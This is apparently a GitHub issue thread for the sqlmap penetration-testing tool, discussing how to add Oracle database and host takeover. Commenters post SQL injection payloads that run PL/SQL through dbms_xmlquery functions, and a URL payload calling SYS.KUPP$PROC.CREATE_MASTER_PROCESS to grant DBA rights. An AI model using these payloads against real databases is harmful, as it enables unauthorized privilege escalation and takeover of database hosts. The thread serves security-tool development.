Open bdamele opened 12 years ago
We were looking at this: http://code.google.com/p/bsqlbf-v2/ as an example of how to do takeover on Oracle DB. Perhaps we will have a pull request ready soon <3
@stamparm @sqlmapproject @inquisb this is possible, though you would have to provide multiple methods and bruteforce your way to the right one or use DBMS fingerprinting to figure out the right trick. Would certainly be a worthy addition to it! See my above link.
Maybe this helps: In Oracle there are 2 Function granted to PUBLIC by default: dbms_xmlquery.newcontext() dbms_xmlquery.getxml()
These 2 functions allow execution of anonymous PLSQL blocks within an SQL Statement. Extremly helpful when injecting in Oracle Databases. Examples: select dbms_xmlquery.newcontext('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual
select dbms_xmlquery.getxml('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual
With this technique it would be possible to create a Java Package with Runtime.exec() to takeover the Databasehost (user needs the rights(grants) for this operation, but this can be checked via the oracle system tables).
@infodox where's your pull request? :)
Bump
There seem to be a few methods to execute OS Commands and through the SYS.KUPP$PROC.CREATE_MASTER_PROCESS function in Oracle up to 11g2.
For example if a URL is vulnerable to AND based SQLi, you could run <url>/id=2' and (Select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT dba TO user;''''; END;'';') from dual) is not null--
I used this in a test scenario and was able to create a user and grant it DBA on Oracle 11g2.
I came across this whitepaper that goes into alot more detail, including privilege escalation. I hope it might be helpfull. https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf
Add support to takeover the file system when the back-end DBMS is Oracle.
References: